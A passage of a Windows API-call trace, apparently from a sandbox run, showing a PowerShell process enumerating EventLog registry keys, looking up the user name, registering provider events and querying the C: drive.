	[0204.306] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.306] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x7, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.308] CoTaskMemFree (pv=0x4331c0) 
	[0204.308] CoTaskMemFree (pv=0x0) 
	[0204.308] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.308] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x8, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.309] CoTaskMemFree (pv=0x4331c0) 
	[0204.309] CoTaskMemFree (pv=0x0) 
	[0204.309] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x30c) returned 0x0
	[0204.309] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x2
	[0204.309] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x310) returned 0x0
	[0204.309] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x2
	[0204.309] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x324) returned 0x0
	[0204.310] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x2
	[0204.310] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x334) returned 0x0
	[0204.310] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x2
	[0204.310] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x338) returned 0x0
	[0204.310] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x2
	[0204.310] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x33c) returned 0x0
	[0204.310] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x2
	[0204.310] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x5
	[0204.324] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x340) returned 0x0
	[0204.324] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x0) returned 0x2
	[0204.324] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x344) returned 0x0
	[0204.324] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d078 | out: phkResult=0x25d078*=0x348) returned 0x0
	[0204.324] RegCloseKey (hKey=0x348) returned 0x0
	[0204.324] RegCloseKey (hKey=0x2e8) returned 0x0
	[0204.325] RegCloseKey (hKey=0x344) returned 0x0
	[0204.902] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0204.902] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0204.904] CoTaskMemFree (pv=0x1b980ae0) 
	[0204.905] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.905] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0204.905] CoTaskMemFree (pv=0x4331c0) 
	[0212.699] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25cfc8 | out: phkResult=0x25cfc8*=0x34c) returned 0x0
	[0212.699] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25cf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25cf3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cf38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.699] CoTaskMemFree (pv=0x0) 
	[0212.699] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.699] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.699] CoTaskMemFree (pv=0x4331c0) 
	[0212.699] CoTaskMemFree (pv=0x0) 
	[0212.699] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.699] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.699] CoTaskMemFree (pv=0x4331c0) 
	[0212.699] CoTaskMemFree (pv=0x0) 
	[0212.699] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.699] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.699] CoTaskMemFree (pv=0x4331c0) 
	[0212.699] CoTaskMemFree (pv=0x0) 
	[0212.699] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.699] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.699] CoTaskMemFree (pv=0x4331c0) 
	[0212.699] CoTaskMemFree (pv=0x0) 
	[0212.699] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.699] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.699] CoTaskMemFree (pv=0x4331c0) 
	[0212.699] CoTaskMemFree (pv=0x0) 
	[0212.699] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.699] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.700] CoTaskMemFree (pv=0x4331c0) 
	[0212.700] CoTaskMemFree (pv=0x0) 
	[0212.700] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.700] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.700] CoTaskMemFree (pv=0x4331c0) 
	[0212.700] CoTaskMemFree (pv=0x0) 
	[0212.700] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.700] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.700] CoTaskMemFree (pv=0x4331c0) 
	[0212.700] CoTaskMemFree (pv=0x0) 
	[0212.700] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.700] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x4331c0, lpcchName=0x25cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.700] CoTaskMemFree (pv=0x4331c0) 
	[0212.700] CoTaskMemFree (pv=0x0) 
	[0212.700] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x350) returned 0x0
	[0212.700] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x0) returned 0x2
	[0212.700] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x354) returned 0x0
	[0212.700] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x0) returned 0x2
	[0212.700] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x358) returned 0x0
	[0212.700] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x0) returned 0x2
	[0212.700] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x35c) returned 0x0
	[0212.701] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x0) returned 0x2
	[0212.701] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x360) returned 0x0
	[0212.701] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x0) returned 0x2
	[0212.701] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x364) returned 0x0
	[0212.701] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x0) returned 0x2
	[0212.701] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d028 | out: phkResult=0x25d028*=0x0) returned 0x5
	[0212.732] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba50008
	[0212.868] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f356d8*="WSMan", lpRawData=0x2f35448) returned 1
	[0212.908] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0212.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.908] CoTaskMemFree (pv=0x3f5ba0) 
	[0212.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.910] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0212.910] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0212.911] CoTaskMemFree (pv=0x1b980ae0) 
	[0212.911] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.911] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0212.911] CoTaskMemFree (pv=0x4331c0) 
	[0212.911] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3b068*="Alias", lpRawData=0x2f3adf8) returned 1
	[0212.925] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0212.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.925] CoTaskMemFree (pv=0x3f5ba0) 
	[0212.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.927] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0212.927] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0212.927] CoTaskMemFree (pv=0x1b980ae0) 
	[0212.927] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.927] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0212.927] CoTaskMemFree (pv=0x4331c0) 
	[0212.928] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f40610*="Environment", lpRawData=0x2f403a0) returned 1
	[0212.956] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0212.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.956] CoTaskMemFree (pv=0x3f5ba0) 
	[0212.957] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0212.957] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0212.957] CoTaskMemFree (pv=0x3f5ba0) 
	[0212.957] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0212.957] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0212.957] CoTaskMemFree (pv=0x3f5ba0) 
	[0212.958] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x25ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0212.958] SetErrorMode (uMode=0x1) returned 0x1
	[0212.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x25d040 | out: lpFileInformation=0x25d040*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.958] SetErrorMode (uMode=0x1) returned 0x1
	[0212.959] GetLogicalDrives () returned 0x4
	[0212.959] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.960] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.960] SetErrorMode (uMode=0x1) returned 0x1
	[0212.961] CoTaskMemAlloc (cb=0x68) returned 0x1b95d020
	[0212.961] CoTaskMemAlloc (cb=0x68) returned 0x1b95d090
	[0212.961] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b95d020, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x25d010, lpMaximumComponentLength=0x25d00c, lpFileSystemFlags=0x25d008, lpFileSystemNameBuffer=0x1b95d090, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25d010*=0x705ba84c, lpMaximumComponentLength=0x25d00c*=0xff, lpFileSystemFlags=0x25d008*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0212.962] CoTaskMemFree (pv=0x1b95d020) 
	[0212.962] CoTaskMemFree (pv=0x1b95d090) 
	[0212.962] SetErrorMode (uMode=0x1) returned 0x1
	[0212.962] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.963] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.963] SetErrorMode (uMode=0x1) returned 0x1
	[0212.963] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25cfb0 | out: lpFileInformation=0x25cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.963] SetErrorMode (uMode=0x1) returned 0x1
	[0212.963] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.963] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25cc00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.963] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.964] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25cb30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.964] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.964] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.964] SetErrorMode (uMode=0x1) returned 0x1
	[0212.965] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25cde0 | out: lpFileInformation=0x25cde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.965] SetErrorMode (uMode=0x1) returned 0x1
	[0212.965] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.965] SetErrorMode (uMode=0x1) returned 0x1
	[0212.965] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25cde0 | out: lpFileInformation=0x25cde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.965] SetErrorMode (uMode=0x1) returned 0x1
	[0212.965] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.965] SetErrorMode (uMode=0x1) returned 0x1
	[0212.965] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25ce80 | out: lpFileInformation=0x25ce80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.965] SetErrorMode (uMode=0x1) returned 0x1
	[0212.966] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0212.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0212.966] CoTaskMemFree (pv=0x1b980ae0) 
	[0212.966] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.966] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0212.966] CoTaskMemFree (pv=0x4331c0) 
	[0212.966] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f47668*="FileSystem", lpRawData=0x2f473f8) returned 1
	[0212.986] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0212.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.986] CoTaskMemFree (pv=0x3f5ba0) 
	[0212.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.988] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0212.988] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0212.988] CoTaskMemFree (pv=0x1b980ae0) 
	[0212.988] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0212.988] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0212.989] CoTaskMemFree (pv=0x4331c0) 
